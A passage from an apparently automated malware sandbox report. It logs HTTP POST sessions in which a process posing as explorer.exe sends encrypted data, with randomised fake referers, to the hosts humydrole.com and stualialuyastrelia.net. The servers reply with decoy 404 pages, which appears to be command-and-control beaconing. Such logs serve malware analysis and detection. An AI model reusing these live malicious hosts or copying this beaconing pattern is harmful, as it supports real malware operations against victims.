73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49774	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:21:00.581429005 CET	339	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nbvsubkfcphboy.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 297 Host: humydrole.com
Nov 30, 2023 11:21:00.581481934 CET	351	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 2a 27 d5 80 Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vu*'QSCAcuSzbue-"A-EP{=+iN2)o%EuW/ENB_t8cakZ%HF;]SC
Nov 30, 2023 11:21:02.589729071 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:21:01 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49775	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:21:02.940462112 CET	341	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://euxorgnykkosboea.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 172 Host: humydrole.com
Nov 30, 2023 11:21:02.940496922 CET	226	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 2c 3f e3 a5 Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vu,?n\[=N02*4>EO(t5HRSAWIM 3]51
Nov 30, 2023 11:21:06.755374908 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:21:03 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49776	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:21:07.103763103 CET	336	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://romujnlvtuf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 191 Host: humydrole.com
Nov 30, 2023 11:21:07.103806973 CET	245	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 67 44 c4 a1 Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vugDIqr`eQ8)6`^NsG+1UK<>\|}*N+w"V\|9~R+
Nov 30, 2023 11:21:08.403954983 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:21:07 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49777	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:21:07.277826071 CET	334	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://udfbliwtklqbk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Nov 30, 2023 11:21:07.277857065 CET	163	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bONfy&5c50
Nov 30, 2023 11:21:07.526896954 CET	248	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:21:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49778	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:21:07.947084904 CET	332	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tphcljxllxr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Nov 30, 2023 11:21:07.947084904 CET	163	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bONfy&5c50
Nov 30, 2023 11:21:08.190795898 CET	248	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:21:08 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49779	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:21:08.706056118 CET	337	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hydbbxvxsbev.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 120 Host: humydrole.com
Nov 30, 2023 11:21:08.706056118 CET	174	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 72 5c a2 a3 Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vur\oS}j[^Vh0Z
Nov 30, 2023 11:21:09.926141024 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:21:09 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49780	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:21:08.751040936 CET	333	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kcajhbvthnwe.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Nov 30, 2023 11:21:08.751125097 CET	163	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bONfy&5c50
Nov 30, 2023 11:21:08.993531942 CET	248	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:21:08 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49781	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:21:09.534600019 CET	334	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ysyayifruegkd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Nov 30, 2023 11:21:09.534652948 CET	163	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bONfy&5c50
Nov 30, 2023 11:21:09.785687923 CET	248	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:21:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49782	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:21:10.195341110 CET	336	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jwgucrriqjikuqj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Nov 30, 2023 11:21:10.195379019 CET	163	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bONfy&5c50
Nov 30, 2023 11:21:10.447036028 CET	248	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:21:10 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49783	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:21:15.206625938 CET	333	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ksqbhnjpngpj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Nov 30, 2023 11:21:15.206625938 CET	163	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bONfy&5c50
Nov 30, 2023 11:21:15.457978964 CET	248	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:21:15 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49784	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:21:18.657093048 CET	335	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uacwpdowhkxgco.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Nov 30, 2023 11:21:18.657093048 CET	163	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bONfy&5c50
Nov 30, 2023 11:21:18.906481028 CET	248	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:21:18 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49785	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:21:21.864006042 CET	335	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://esndaogtnojjrf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Nov 30, 2023 11:21:21.864006042 CET	163	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bONfy&5c50
Nov 30, 2023 11:21:22.107872963 CET	248	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:21:21 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49787	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:21:25.284759998 CET	334	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qoamsettsbsvj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Nov 30, 2023 11:21:25.284797907 CET	163	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bONfy&5c50
Nov 30, 2023 11:21:25.528301954 CET	248	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:21:25 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49788	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:21:32.127881050 CET	333	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bjoexvsmqvla.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Nov 30, 2023 11:21:32.127918959 CET	163	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bONfy&5c50
Nov 30, 2023 11:21:32.374089003 CET	248	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:21:32 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49789	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:21:38.705600977 CET	332	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://npnaprugakd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Nov 30, 2023 11:21:38.705655098 CET	163	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bONfy&5c50
